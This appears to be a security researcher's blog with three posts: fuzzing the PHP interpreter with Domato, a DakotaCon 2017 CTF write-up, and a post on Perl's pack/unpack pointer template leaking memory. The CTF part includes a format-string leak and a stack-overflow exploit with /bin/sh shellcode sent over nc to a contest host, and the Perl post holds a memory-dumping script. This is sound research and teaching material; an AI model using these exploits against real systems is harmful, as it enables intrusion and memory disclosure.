Friday, January 3, 2020

Fuzzing PHP with Domato

For clarity and brevity, the code referenced below has been distilled to simplest form.  The complete versions which were actually used for fuzzing can be found here.

Lately I've been working on fuzzing the PHP interpreter. I've explored many tools and techniques (AFL, LibFuzzer, even a custom fuzz engine), but most recently I decided to give Domato a try. For those not aware, Domato is a grammar-based DOM fuzzer, built to tease complex bugs out of complex code-bases.  It was originally designed with browsers in mind, but I figured I might be able to re-purpose it for fuzzing the PHP interpreter.

Context-free Grammar


In order to use Domato, one must first describe the language using a context-free grammar.  A CFG is simply a set of rules which define how a language is constructed.  For instance, if our language was composed of sentences in the form...

[name] has [number] [adjective] [noun]s.
[name]'s [noun] is very [adjective].
I want to purchase [number] [adjective] [noun]s. 

...and each of those variables could take several forms, such as...

Names: alice, bob, eve
Numbers: 1, 10, 100
Adjectives: green, large, expensive
Nouns: car, hat, laptop

...then our context free grammar might look like...

<name> = alice
<name> = bob
<name> = eve
<number> = 1
<number> = 10
<number> = 100
<adjective> = green
<adjective> = large
<adjective> = expensive
<noun> = car
<noun> = hat
<noun> = laptop
<sentence> = <name> has <number> <adjective> <noun>s.
<sentence> = <name>'s <noun> is very <adjective>.
<sentence> = I want to purchase <number> <adjective> <noun>s.

Domato then uses our context free grammar to generate random combinations which conform to the rules of the language. For example...

eve has 1 expensive laptops.
alice's hat is very green.
I want to purchase 100 expensive cars.
I want to purchase 10 large laptops.
bob has 100 expensive cars.
eve has 100 green laptops.
I want to purchase 100 large laptops.
bob has 1 large cars.
I want to purchase 1 large cars.
I want to purchase 1 large hats.
bob's laptop is very expensive.


As you can imagine, by breaking each rule down into many more sub-rules, we can begin to define much more complex language, well beyond a simple search/replace.  In practice, Domato also provides some built-in functionality for limiting recursion, and generating basic types (int, char, string, etc).  For instance, consider the following Domato grammar, which generates pseudo-code...

!max_recursion 10

<varname> = var<int min=0 max=10>

<vardef> = int <varname> = <int>
<vardef> = char <varname> = '<char min=32 max=127>'

<condition> = <varname> == <varname>
<condition> = <varname> == <int>
<condition> = <varname> != <int>

<statement> = <vardef>;
<statement> = if (<condition>) { <statement> } else { <statement> }
<statement> = while (<condition>) { <statement> }
<statement> = <statement>; <statement>;

<examplefuzz> = <statement>

!begin lines
<examplefuzz>
!end lines
 

Feeding this into Domato produces the following...

if (var0 == var5) { int var5 = 915941154; } else { int var3 = 1848395349; }; if (var3 == -121615885) { int var7 = 1962369640;; int var1 = 196553597;;; int var6 = -263472135;; } else { int var2 == 563276937; };
while (var9 = var8) { while (var0 == -2029947247) { int var7 = 1879609559; } }; char var0 = '';;
char var2 = '/';
char var3 = 'P';
if (var8 == var1) { int var7 = -306701547; } else { while (var3 == 868601407) { while (var0 == -1328592927) { char var10 = '^'; }; char var8 = 'L';;; int var9 = -1345514425;; char var5 = 'b';;; } }
int var8 = 882574440;
if (var8 == var9) { int var7 = 1369926086; } else { if (var9 != -442302103) { if (var3 != 386704757) { while (var4 != -264413007) { char var6 = 'C'; } } else { int var8 = 289431268; } } else { char var10 = '~'; } }
char var5 = '+';
if (var9 == 1521038703) { char var2 = '&'; } else { int var7 = -215672117; }
while (var9 == var0) { char var9 = 'X';; int var7 = -1463788903;; }; if (var8 == var7) { int var10 = 1664850687;; char var6 = 'f';; } else { while (var5 == -187795546) { int var3 = -1287471401; } };


This is perfectly suited for fuzzing an interpreter, because each sample is both unusual, and still guaranteed to be syntactically valid! :)

Enumerating the Attack Surface

The next step then is to describe the PHP language as a CFG.  If you're interested in seeing a complete CFG, download the PHP source code, and look in Zend/zend_language_parser.y.  However I was more interested in fuzzing specific code-patterns.  So, I implemented my CFG such that it only generated calls to built-in functions and class methods using "fuzzy" parameters.  For this, we need a list of functions, methods, and their arguments.

There are two ways to obtain this data.  The simplest is to use PHP's built in Reflection classes to iterate over all defined functions and classes, building a list.  The following code demonstrates this for all internal PHP functions...

<?php

foreach (get_defined_functions()["internal"] as $f) {

    $r = new ReflectionFunction($f);

    $params = array();
    foreach ($r->getParameters() as $p) {
        $params[] = $p->getName();
    }

    echo "$f(" . implode(", ", $params) . ");\n";

}

?>


This produces something like...

andrew@thinkpad /tmp % php lang.php 
zend_version();
func_num_args();
func_get_arg(arg_num);
func_get_args();
strlen(str);
strcmp(str1, str2);
strncmp(str1, str2, len);
strcasecmp(str1, str2);
strncasecmp(str1, str2, len);
each(arr);
error_reporting(new_error_level);
define(constant_name, value, case_insensitive);
defined(constant_name);
get_class(object);
... etc ...


The problem with this however, is that this list contains no type information.  Yes, the ReflectionParameter class does contain a getType method, however it doesn't seem to work at the moment for the vast majority of functions.  :(  Maybe this is a bug?  Hard to say.  Regardless, having type information will make our fuzzing efforts significantly more effective, so it's worth the time investment to find another way to get that data.

The less-elegant way of obtaining this data is to scrape the PHP documentation and parse out what we need.  Luckily, PHP's documentation is generally quite good, and can be downloaded as a single gzipped HTML document here.  After a few arduous hours writing regular expressions, I was able to parse that into a usable list of functions, methods, and argument types.  I'll leave this as an exercise to the reader, but the final product (in CFG form) looked like this...

<functioncall> = abs(<fuzzmixed>)
<functioncall> = acos(<fuzzfloat>)
<functioncall> = acosh(<fuzzfloat>)
<functioncall> = addcslashes(<fuzzstring>, <fuzzstring>)
<functioncall> = addslashes(<fuzzstring>)
<functioncall> = array_change_key_case(<fuzzarray>, <fuzzint>)
<functioncall> = array_chunk(<fuzzarray>, <fuzzint>, <fuzzbool>)

... snip snip snip ...

<methodcall> = <obj_DateInterval>->createFromDateString(<fuzzstring>)
<methodcall> = <obj_DateInterval>->format(<fuzzstring>)
<methodcall> = <obj_DatePeriod>->getDateInterval()
<methodcall> = <obj_DatePeriod>->getEndDate()
<methodcall> = <obj_DatePeriod>->getRecurrences()
<methodcall> = <obj_DatePeriod>->getStartDate()
<methodcall> = <obj_DateTime>->add(<fuzzDateInterval>)
<methodcall> = <obj_DateTime>->createFromFormat(<fuzzstring>, <fuzzstring>, <fuzzDateTimeZone>) 

... snip snip snip ...

<obj_DateInterval> = $vars["DateInterval"]
<obj_DatePeriod> = $vars["DatePeriod"]
<obj_DateTime> = $vars["DateTime"]
<obj_DateTimeImmutable> = $vars["DateTimeImmutable"]
<obj_DateTimeZone> = $vars["DateTimeZone"]
<obj_Directory> = $vars["Directory"]
<obj_DOMAttr> = $vars["DOMAttr"]

... etc ...

Setting up Domato

In order for Domato to use our grammar, we'll also need to define some basic components such as <fuzzint>, <fuzzstring>, and <fuzzarray>.  We will set them to potentially dangerous values, such as INT_MAX, -1, NULL, "AAA....AAA", array(array(array())), etc.  These will be fed into our function and method calls.  Additionally, we'll tell Domato to wrap each line in try/catch blocks, so that exceptions and errors won't be fatal.  After quite a lot of tweaking and tuning, my configuration ended up looking a bit like this...

!lineguard try { try { <line> } catch (Exception $e) { } } catch(Error $e) { }

<fuzzvoid> = 

<fuzzbool> = true
<fuzzbool> = false

<fuzzinteger> = <fuzzint>

<fuzzint> = 0
<fuzzint> = 1
<fuzzint> = -1
<fuzzint> = 1000000
<fuzzint> = <largeint>
<fuzzint> = -<largeint>

<largeint> = 2147483647
<largeint> = 2147483648
<largeint> = 4294967295
<largeint> = 4294967296

<fuzzfloat> = 2.2250738585072011e-308

<fuzznumber> = <fuzzint>
<fuzznumber> = <fuzzfloat>

<fuzzstring> = str_repeat("A", 0x100)
<fuzzstring> = implode(array_map(function($c) {return "\\x" . str_pad(dechex($c), 2, "0");}, range(0, 255)))
<fuzzstring> = str_repeat("%s%x%n", 0x100)

<repeatcount> = 257
<repeatcount> = 65537

<array> = range(0, 10)
<array> = array("a" => 1, "b" => "2", "c" => 3.0)
<fuzzarray> = <array>

<fuzzmixed> = <fuzzint>
<fuzzmixed> = <fuzzfloat>
<fuzzmixed> = <fuzzbool>
<fuzzmixed> = <fuzzstring>
<fuzzmixed> = <fuzzarray>

!include php/phplang.txt

<fuzzline> = <methodcall>;
<fuzzline> = <functioncall>;

!begin lines
<fuzzline>
!end lines

We also need to define a template which the grammar will be applied to.  The template will set up the environment, instantiate any objects that might later be used, and then run each fuzz line.  My template looked a bit like this...
<?php

$vars = array(
    "stdClass"                       => new stdClass(),
    "Exception"                      => new Exception(),
    "ErrorException"                 => new ErrorException(),
    "Error"                          => new Error(),
    "CompileError"                   => new CompileError(),
    "ParseError"                     => new ParseError(),
    "TypeError"                      => new TypeError(),
    ... etc ...
);

<phpfuzz>

?>

The last step is to copy and modify Domato's generator.py file.  I found that simply making the following changes was sufficient...
  • Lines 55 and 62: change the root element to '<phpfuzz>'
  • Line 78: reference my own 'template.php'
  • Line 83: reference my own grammar in 'php.txt'
  • Line 134: change the output name and extension to '<uuid>.php'

We should then be able to generate valid fuzz input!

andrew@thinkpad ~/domato/php % python generator.py /dev/stdout
Writing a sample to /dev/stdout

<?php

$vars = array(
    "stdClass"                       => new stdClass(),
    "Exception"                      => new Exception(),
    "ErrorException"                 => new ErrorException(),
    "Error"                          => new Error(),
    "CompileError"                   => new CompileError(),
    "ParseError"                     => new ParseError(),
    "TypeError"                      => new TypeError(),
    ... etc ...
);

try { try { $vars["SplPriorityQueue"]->insert(false, array("a" => 1, "b" => "2", "c" => 3.0)); } catch (Exception $e) { } } catch(Error $e) { }
try { try { filter_has_var(1000, str_repeat("%s%x%n", 0x100)); } catch (Exception $e) { } } catch(Error $e) { }
try { try { posix_access(implode(array_map(function($c) {return "\\x" . str_pad(dechex($c), 2, "0");}, range(0, 255))), -1); } catch (Exception $e) { } } catch(Error $e) { }
try { try { rand(0, 0); } catch (Exception $e) { } } catch(Error $e) { }
try { try { fputcsv(fopen("/dev/null", "r"), array("a" => 1, "b" => "2", "c" => 3.0), str_repeat(chr(135), 65), str_repeat(chr(193), 17) + str_repeat(chr(21), 65537), str_repeat("A", 0x100)); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["ReflectionMethod"]->isAbstract(); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["DOMProcessingInstruction"]->__construct(str_repeat(chr(122), 17) + str_repeat(chr(49), 65537) + str_repeat(chr(235), 257), str_repeat(chr(138), 65) + str_repeat(chr(45), 4097) + str_repeat(chr(135), 65)); } catch (Exception $e) { } } catch(Error $e) { }
try { try { utf8_encode(str_repeat("A", 0x100)); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["MultipleIterator"]->current(); } catch (Exception $e) { } } catch(Error $e) { }
try { try { dl(str_repeat("A", 0x100)); } catch (Exception $e) { } } catch(Error $e) { }
try { try { ignore_user_abort(true); } catch (Exception $e) { } } catch(Error $e) { } 

Preparing to Fuzz

Now that we have data to fuzz with, we need to build PHP in a way that maximizes our chances of detecting any kind of memory corruption.  For this, I strongly recommend the LLVM Address Sanitizer (ASAN), which will detect any invalid memory access, even if it would not immediately result in a crash.

To build PHP with ASAN, download the latest version of the source code here, and run the following commands...

./configure CFLAGS="-fsanitize=address -ggdb" CXXFLAGS="-fsanitize=address -ggdb" LDFLAGS="-fsanitize=address"
make
make install 


Before leaving a fuzzer to run unattended, it's also a good idea to try to eliminate any conditions that hold up the process unnecessarily.  For instance, like most languages PHP has a function called sleep(), which takes an integer argument and simply waits that many seconds before continuing.  Calling this function with large fuzz-values such as INT_MAX will quickly tie up even a large fuzz cluster.

There are also functions which could cause the process to "crash" legitimately, such as posix_kill(), or posix_setrlimit().  We may wish to remove these from our test corpus in order to reduce the number of false positives.

Finally, since many of the functions and classes listed in the PHP documentation are not actually available in the core install (rather, from extensions) we may wish to remove some of them from our corpus to avoid wasting time calling non-existent code.

Finally, after some experimentation, I settled on the following list...

$class_blacklist = array(
// Can't actually instantiate
    "Closure",
    "Generator",
    "HashContext",
    "RecursiveIteratorIterator",
    "IteratorIterator",
    "FilterIterator",
    "RecursiveFilterIterator",
    "CallbackFilterIterator",
    "RecursiveCallbackFilterIterator",
    "ParentIterator",
    "LimitIterator",
    "CachingIterator",
    "RecursiveCachingIterator",
    "NoRewindIterator",
    "AppendIterator",
    "InfiniteIterator",
    "RegexIterator",
    "RecursiveRegexIterator",
    "EmptyIterator",
    "RecursiveTreeIterator",
    "ArrayObject",
    "ArrayIterator",
    "RecursiveArrayIterator",
    "SplFileInfo",
    "DirectoryIterator",
    "FilesystemIterator",
    "RecursiveDirectoryIterator",
    "GlobIterator",
);

$function_blacklist = array(
    "exit", // false positives
    "readline",    // pauses
    "readline_callback_handler_install", // pauses
    "syslog",    // spams syslog
    "sleep", // pauses
    "usleep", // pauses
    "time_sleep_until", // pauses
    "time_nanosleep", // pauses
    "pcntl_wait", // pauses
    "pcntl_waitstatus", // pauses
    "pcntl_waitpid", // pauses
    "pcntl_sigwaitinfo", // pauses
    "pcntl_sigtimedwait", // pauses
    "stream_socket_recvfrom", // pauses
    "posix_kill", // ends own process
    "ereg", // cpu dos
    "eregi", // cpu dos
    "eregi_replace", // cpu dos
    "ereg_replace", // cpu dos
    "similar_text", // cpu dos
    "snmpwalk", // cpu dos
    "snmpwalkoid", // cpu dos
    "snmpget", // cpu dos
    "split", // cpu dos
    "spliti", // cpu dos
    "snmpgetnext", // cpu dos
    "mcrypt_create_iv", // cpu dos
    "gmp_fact", // cpu dos
    "posix_setrlimit"
);

Although one machine could both generate and fuzz the samples alone, I opted for a small cluster of machines to speed up the process.  I used Proxmox, running on an Intel NUC, with 10 Debian VM's whose jobs were the following...

  • Node 0: Sample generator, hosting an NFS share.
  • Nodes 1-8: Fuzz nodes, pulling samples from the NFS share to test.
  • Node 9: Triage node: Binning crashing samples based on crash metrics.

I created simple, crude shell scripts to run on each of these to carry out those duties.  Those scripts can be found in the github repo linked above.


Finding Crashes

After only a short period of time, my work paid off!  Within minutes the fuzzer had generated several crashing samples, and overnight it created more than 2,000.

By binning the crashes according to the instruction address they crashed on, I was able to determine that all 2,000 were the result of only 3 unique bugs.  Of these, 2 were clearly unexploitable (both OOM errors due to stack exhaustion), however the last appeared to be a use-after-free!  Here is the minimized crashing sample...

<?php
$x = array(new XMLWriter());
$x[0]->openUri("/tmp/a");
$x[0]->startComment();
?>


This bug has since been fixed in bug#79029 (this commit), and should be included in the next release.  In the next few blog posts I will discuss the process tracing it back to the root cause, abusing it to achieve arbitrary code execution, and a neat little shellcode trick that I discovered along the way.

Stay tuned!  :)

Thursday, April 27, 2017

DakotaCon 2017 CTF Write-ups

DakotaCon 7 is a wrap, and the CTF was a blast!  Many thanks to Alex for putting it all together this year.  First place went to ZonkSec, who also deserve a shout-out for their awesome write-ups here.  No sense in duplicating that excellent work, but I’d like to cover a few of the other challenges which I found particularly interesting.  Links to relevant files are included below each section.

This covers RE 200, RE 250, Exploit 100, Exploit 250, and Web 150.

RE 200

RE200 supplied a binary and an IP/port combination on which that binary was said to be running.  The challenge stated “Give it a valid key to get the flag”.

When run this program asked for a key and then read data from stdin.  The first key I tried was of course invalid.



Opening this binary in IDA revealed only two interesting functions: main() and strip_newline().  Unsurprisingly strip_newline() did exactly what it said, replaced trailing newlines with NULLs.  Without too much additional effort it was also clear that main() simply read in up to 40 characters, checked to ensure only 15 had actually be supplied, and then looped through each performing some operation on the array.  Eventually, it compared another local variable to the 32-bit constant “0x65b6b48c” and printed the flag if a match was found.  This left me with a simplified IDA graph that looked like this:



The only part that did NOT initially make sense was the body of the loop, which performed complex operations involving addition, subtraction, multiplication, and shifts it both directions.  This looked very strange, until I remembered that compilers will occasionally replace simple math operations with more complex, (but more efficient) variants using magic constants.  The two constants shown above looked suspiciously like this type of optimization, so I asked myself, “What other two operations might the challenge creator check following a check for divisibility by 2”?  The obvious answer was “divisibility by 3,4,5,6….”, so I compiled a testcase and checked for similar patterns.

#include
int main() {
  int i;
  for(i=0; i<15; i++) {
    if(i % 2 == 0) {}
    else if(i % 3 == 0) {}
    else if(i % 4 == 0) {}
    else if(i % 5 == 0) {}
    else if(i % 6 == 0) {}
    else if(i % 7 == 0) {}
    else if(i % 8 == 0) {}
    else if(i % 9 == 0) {}
    else {}
  }
}

I compiled this code (32 bit ELF with gcc) and disassembled it.  Ah ha!  The code generated for “i % 3 == 0” and “i % 5 == 0” was nearly identical to the two blocks shown above. This meant the program had to be something like:

#include 
 
int main() {
 
  char buffer[40];
  int result, i;
  FILE *fp;
 
  fgets(buffer, 40, stdin);
  strip_newline(buffer);
 
  if(strlen(buffer) == 15) {
 
    for(i=0; i<15; i++) {
 
      if(i % 2 == 0)
        result += buffer[i];
 
      if(i % 3 == 0)
        result *= buffer[i];
 
      if(i % 5 == 0)
        result ^= buffer[i];
 
    }
 
    if(result == 0x65b6b48c) {
      fp = fopen("keycheck1-flag", "r");
      fgets(buffer, 40, fp);
      strip_newline(buffer);
      fclose(fp);
      printf("Flag is %s\n", buffer);
      exit(0);
    } else {
      printf("Invalid key\n");
      exit(0);
    }
 
  } else {
 
    printf("Invalid key\n");
 
  }
 
}
With a full understanding of how the program worked I got a pen and paper and tried to find a simple solution.  However I quickly realized there wasn’t going to be one (with my limited math skill at least), so I instead wrote a small program to bruteforce an answer.  No, this is probably not the most efficient way to do it. Yes, it worked. :)

#include 
#include 
 
#define START_CHAR ' '  // try a, A, 0, etc...
#define END_CHAR '/'    // try z, Z, 9, etc...
 
int main() {
 
  char a,b,c,d,e,f,g,h,i,j,k,l,m,n,o;
  char buffer[16] = {0};
  int z, result;
 
  for(a=START_CHAR; a<=END_CHAR; a++) { buffer[0] = a;
  for(b=START_CHAR; b<=END_CHAR; b++) { buffer[1] = b;
  for(c=START_CHAR; c<=END_CHAR; c++) { buffer[2] = c;
  for(d=START_CHAR; d<=END_CHAR; d++) { buffer[3] = d;
  for(e=START_CHAR; e<=END_CHAR; e++) { buffer[4] = e;
  for(f=START_CHAR; f<=END_CHAR; f++) { buffer[5] = f;
  for(g=START_CHAR; g<=END_CHAR; g++) { buffer[6] = g;
  for(h=START_CHAR; h<=END_CHAR; h++) { buffer[7] = h;
  for(i=START_CHAR; i<=END_CHAR; i++) { buffer[8] = i;
  for(j=START_CHAR; j<=END_CHAR; j++) { buffer[9] = j;
  for(k=START_CHAR; k<=END_CHAR; k++) { buffer[10] = k;
  for(l=START_CHAR; l<=END_CHAR; l++) { buffer[11] = l;
  for(m=START_CHAR; m<=END_CHAR; m++) { buffer[12] = m;
  for(n=START_CHAR; n<=END_CHAR; n++) { buffer[13] = n;
  for(o=START_CHAR; o<=END_CHAR; o++) { buffer[14] = o;
 
    result = 0;
 
    for (z=0; z<15; z++) {
 
      if(z % 2 == 0) {
        result += (int)buffer[z];
      }
 
      if(z % 3 == 0) {
        result *= (int)buffer[z];
      }
 
      if(z % 5 == 0) {
        result ^= (int)buffer[z];
      }
 
    }
 
    if(result == 0x65b6b48c) {
      printf("\n\nWIN: %s = 0x%08x\n", buffer, result);
      exit(0);
    }
 
  }}}}
  printf("%s = 0x%08x\r", buffer, result);
  }}}}}}}}}}}
 
}

After running several instances in parallel for several hours with different inputs, it finally spat out:


When submitted to the server, I got the flag.


The binary can be downloaded here.

RE 250

This challenge was very similar to RE200, however it added one twist.  This time, only 10 bytes were required from the user (up to 40 read), but before being looped over and the result calculated, the program would connect out to 138.247.115.12:10011 and receive up to 39 bytes.  These bytes were then XORed with the user input buffer before the main loop.  Additionally, this loop only contained two conditional operations, as opposed to three above.  Again, I saw interesting integer constants resulting from compiler optimization. Additionally, the final result was compared against “0xfffffaba” which is the signed negative integer -1350. All together, I imagine the source code looks something like this:

#include 
 
int main() {
 
  char buffer1[40], buffer2[40];
  int result, i;
 
  fgets(buffer1, 40, stdin);
  strip_newline(buffer1);
  read(custom_connect_func("138.247.115.12", 10011), buffer2, 39);
 
  if(strlen(buffer1) == 10) {
 
    xor_buffers(buffer1, buffer2);  // destination=buffer1
 
    for(i=0; i<10; i++) {
 
      if(i % 3 == 0)
        result *= buffer[i];
 
      if(i % 2 == 0)
        result *= buffer[i];
 
    }
 
    if(result == 0xfffffaba) {
      fp = fopen("keycheck2-flag", "r");
      fgets(buffer1, 40, fp);
      strip_newline(buffer1);
      fclose(fp);
      printf("Flag is %s\n", buffer1);
      exit(0);
    } else {
      printf("Invalid key\n");
      exit(0);
    }
 
  } else {
    printf("Invalid key\n");
  }
 
}

When I connected to the socket referenced in the binary, it sent back the string “EiHohtei5s” (10 bytes).  This value stayed static.  I never observed a change.  Pretty straightforward.  I adapted my bruteforcer code from above to handle this challenge.

#include 
#include 
#include 
 
#define START_CHAR 'A'  // try a, A, 0, etc...
#define END_CHAR 'z'    // try z, Z, 9, etc...
 
void xor_buffers(char *dst, char *src) {
  int i;
  for(i=0; i<10; i++) {
    dst[i] ^= src[i];
  }
}
 
int main() {
 
  char buffer1[40] = {0}, buffer2[40] = {0};
  char a,b,c,d,e,f,g,h,i,j;
  int z, result;
 
  for(a=START_CHAR; a<=END_CHAR; a++) {
  for(b=START_CHAR; b<=END_CHAR; b++) {
  for(c=START_CHAR; c<=END_CHAR; c++) {
  for(d=START_CHAR; d<=END_CHAR; d++) {
  for(e=START_CHAR; e<=END_CHAR; e++) {
  for(f=START_CHAR; f<=END_CHAR; f++) {
  for(g=START_CHAR; g<=END_CHAR; g++) {
  for(h=START_CHAR; h<=END_CHAR; h++) {
  for(i=START_CHAR; i<=END_CHAR; i++) {
  for(j=START_CHAR; j<=END_CHAR; j++) {
 
    result = 0;
 
    strcpy(buffer2, "EiHohtei5s");
    buffer1[0] = a; buffer1[1] = b; buffer1[2] = c;
    buffer1[3] = d; buffer1[4] = e; buffer1[5] = f;
    buffer1[6] = g; buffer1[7] = h; buffer1[8] = i;
    buffer1[9] = j;
 
    xor_buffers(buffer2, buffer1);
 
    for(z=0; z<10; z++) {
 
      if(z % 3 == 0)
        result *= buffer2[z];
 
      if(z % 2 == 0)
        result -= buffer2[z];
 
    }
 
    if(result == 0xfffffaba) {
      printf("\n\nWIN: %s = 0x%08x\n", buffer1, result);
      exit(0);
    }
 
  }}}}
  printf("%s = 0x%08x\r", buffer1, result);
  }}}}}}
}

In a matter of seconds this spat out a correct solution (probably one of thousands, if not many more).


Submitting this to the sever captured the flag.


The binary can be downloaded here.


Exploit 100

This challenge supplied a C file and an IP/port combination where the program was said to be running.  The C file read as follows:

#include 
 
int main()
{
  char flag[40];
  char input[40];
 
  FILE* f = fopen("flag", "r");
  fgets(flag, 40, f);
 
  printf("Enter your message: ");
  fgets(input, 40, stdin);
  printf(input);
 
  return 0;
}

As far as I can tell there is only one opportunity for shenanigans here, the printf() being called with our input as the format specifier, a classic format string vulnerability.  If you’re not familiar with the concept, I would recommend some Googling. :)

Normally in order to exploit a format string vulnerability we would need to jump through some tricky hoops, calculating offsets and overwriting pointers.  However in this case, since the flag is stored directly below our on the stack, we don’t really need full code execution to win.  All we really need to do is leak data off the stack in the right place.  Printf is perfect for this!  For reference, our stack will probably look something like this (assuming 32-bit):


Unfortunately since the flag itself is on the stack as opposed to a pointer to it, we won’t be able to use the normal “%s” specifier.  Instead we’ll need to leak it using something like “%08x” (a 8-character, 32-bit hexadecimal integer), and then convert the characters back manually.  Also, we can use the “%n$…” format specifier type in order to skip to exactly the offset we want and avoid the 40-character limit problem.  A quick bit of shell scripting gives us an idea of what the stack looks like.  (FYI: this is for fish.  Bash users will need to modify it a bit).


Ah ha!  At offset 8 the data starts to look a lot like ASCII.  Let’s clean up our format string a bit to target exactly what we want.


Let’s throw that in $RandomOnlineASCIIConverter and see what it spits out.

upeR.lbat.meRe.yHxi.tard.[\0][\n]de.

Pretty close! But recall, since this is a little-endian CPU each of those “integers” was retrieved in reverse. Let’s reverse each set of four, remove the dot-separators, and get…

ReputableRemixHydrate[\n][\0]

Exploit 250

Oh good, another binary!  And like the others, this one also comes with an IP/port combination where the program is running.  Opening it in IDA shows an extremely simple program with only two functions, main(), and vuln(), depicted side-by-side here.


These roughly translate to something like:

#include 
 
void vuln() {
  char buffer[72]; // maybe less? (stack alignment)
  printf("Enter your message: ");
  gets(buffer);
  printf("%p\n", buffer);
  puts(buffer);
}
 
int main() {
  setvbuf(stdout, NULL, _IONBF, 0);
  printf("%p\n", vuln);
  vuln();
  return 0;
}

As you can see we have a good ol’ fashioned stack smash at >72 characters.  Easy. :) Add 4 bytes for the save EBP and we can overwrite EIP at 76 bytes.  Normally we would need an ASLR bypass in order to find our data reliably in memory, however running this a few times and observing the buffer pointer being printed, we can see it never really changes.


0xffffdc80.  Always.  Sweet!  Normally we’d now need to build a ROP chain to bypass NX, but this binary conveniently has that feature disabled.  Too easy!
In order to get code execution I grabbed some shellcode off of exploit-db.  We’re almost done, but there are two problems.

1. At the time the shellcode begins executing, ESP and EIP will be pointing to the same location.  Since our shellcode uses the stack to build the “/bin/sh” string in memory, it will end up overwriting the code we are currently executing and crash.  Doh!  Luckily there’s an easy fix.  We can simply append a “sub esp, 0xff” instruction to the beginning in order to shift the stack up out of the way.

2. The shellcode author forgot to set ECX to NULL, and unfortunately in this case it won’t already be.  Again, easy fix though; we can just add an “xor ecx, ecx” at the end before we perform the system call.

With these two fixes in place, our final shellcode looks like:

00000000 <.data>:
   0:   81 ec ff 00 00 00       sub    esp,0xff
   6:   6a 0b                   push   0xb
   8:   58                      pop    eax
   9:   99                      cdq    
   a:   52                      push   edx
   b:   68 2f 2f 73 68          push   0x68732f2f
  10:   68 2f 62 69 6e          push   0x6e69622f
  15:   89 e3                   mov    ebx,esp
  17:   31 c9                   xor    ecx,ecx
  19:   cd 80                   int    0x80

We’ll need to pad this out to 76 characters with NOPS (0x90), and then put the buffer pointer at the end (little endian!).  When we send it, we’ll pipe the output through cat, and add “/dev/tty” so that we can type once the shell lands.  The final exploit string is:

perl -e 'print "\x90"x(76-27) . \
"\x81\xEC\xFF\x00\x00\x00\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80" . \
"\x80\xdc\xff\xff" . "\n";' \
|cat /dev/stdin /dev/tty| nc 138.247.115.12 3269

And we have our shell!


The binary can be downloaded here.

Web 150

This challenge stated: “There is a tor hidden service running at dakotaconk4nfuxu.onion. Your task is to figure out the real IP of the service. The flag is being served on that IP.”

Browsing to this hidden service revealed it was running PHPBB, however the version was current, so no simple exploitation there.

I ran a Nikto scan which revealed the infamous “/server-status” page, however that didn’t reveal the IP address we need.  I started poking around the PHPBB board, and realized the “password reset” feature was enabled, which, if not configured to use Tor, might leak the internal IP in the email headers it sent.  Sure enough, it did!


Unfortunately this box went offline before I got around to writing this walk-through, and I didn’t save screenshots, however from here it was just a matter of running Nmap, noticing that port 1337 was open (weird!) and connecting to receive the flag.  Cool challenge!

Thanks again to Alex for putting this on, and to the Dakota Con team for facilitating the con.  Can’t wait for next year!

Monday, August 8, 2016

Perl Leaks Memory by Design

The title says it all. A Perl script can, by design, read arbitrary memory from the interpreter process. Maybe you were already aware of this, and I’m just late to the game, but… what???!?!

Perl, like many other languages provides pack()/unpack() functions which allow data to be converted to/from raw binary representations.  For instance, running…

printf("%s", pack("L",0x41424344));

…will print DCBA.  The first argument is a template and specifies how to pack or unpack the data.  For example in the snippet above, the “L” signifies an unsigned long.  For the most part these functions are implemented as you would expect, however Perl adds an additional template not present in any other language I’ve ever seen: the “p/P” template.  According to the Perl documentation, this template specifies a pointer. [1]  Yes, you read that right, a pointer.  It’s suppose to work like this…

$a = pack("p", "testing testing 123");
 
# prints 0xNNNNNNNN (raw pointer to the string)
printf("0x%08x", unpack("L", $a));
 
# prints "testing testing 123"
printf("%s",  unpack("p", $a));

But if we can control the pointer itself, what else could we read? Let’s try unpack()’ing an arbitrary pointer using the “p” template…

andrew@WOPR ~ % gdb -q perl
Reading symbols from perl...(no debugging symbols found)...done.
(gdb) r -e 'print unpack("p","AAAAAAAA");'
Starting program: /usr/bin/perl -e 'print unpack("p","AAAAAAAA");'
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
 
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff76c5d76 in strlen () from /usr/lib/libc.so.6
(gdb) x/1i $rip
=> 0x7ffff76c5d76 : movdqu (%rax),%xmm4
(gdb) i r $rax
rax            0x4141414141414141   4702111234474983745
(gdb) bt
#0  0x00007ffff76c5d76 in strlen () from /usr/lib/libc.so.6
#1  0x00007ffff7ad8583 in Perl_newSVpv () from /usr/lib/perl5/core_perl/CORE/libperl.so
#2  0x00007ffff7b553a2 in S_unpack_rec () from /usr/lib/perl5/core_perl/CORE/libperl.so
#3  0x00007ffff7b57708 in Perl_unpackstring () from /usr/lib/perl5/core_perl/CORE/libperl.so
#4  0x00007ffff7b578e6 in Perl_pp_unpack () from /usr/lib/perl5/core_perl/CORE/libperl.so
#5  0x00007ffff7abb2c6 in Perl_runops_standard () from /usr/lib/perl5/core_perl/CORE/libperl.so
#6  0x00007ffff7a43379 in perl_run () from /usr/lib/perl5/core_perl/CORE/libperl.so
#7  0x0000000000400e29 in main ()
(gdb)

There you have it. Perl is attempting to read from a completely controllable address. This can be leveraged to leak the entire contents of memory. Let’s do that. The following script will leak memory off the heap until it falls off the page. This could be easily modified to keep leaking the next page(s) too, but I didn’t add that logic.

#!/usr/bin/perl
 
use Time::HiRes;
 
$row_width = 16;
$print_throttle = 10000;
 
$str = "whatever";              # put something on the heap
$ptr = unpack(Q,pack(p,$str));  # get a real pointer to it
 
 
$str2 = "TESTING";
 
for(;;$ptr+=$row_width) {
 
    # print the address
    printf("0x%016x | ", $ptr);
 
    # print $row_width hex bytes
    for($c=0; $c<$row_width; $c++) { 
        $a = unpack(p,pack(Q,$ptr+$c)); # string
        $a = substr($a,0,1);            # single byte
        printf("%02x ", ord($a));
    }
 
    print "| ";
 
    # print real bytes
    for($c=0; $c<$row_width; $c++) { 
        $a = unpack(p,pack(Q,$ptr+$c)); # string
        $a = substr($a,0,1);            # single byte
        # only print ascii
        if(ord($a) >= 0x20 && ord($a) <= 0x7e) {
            printf("%c", ord($a));
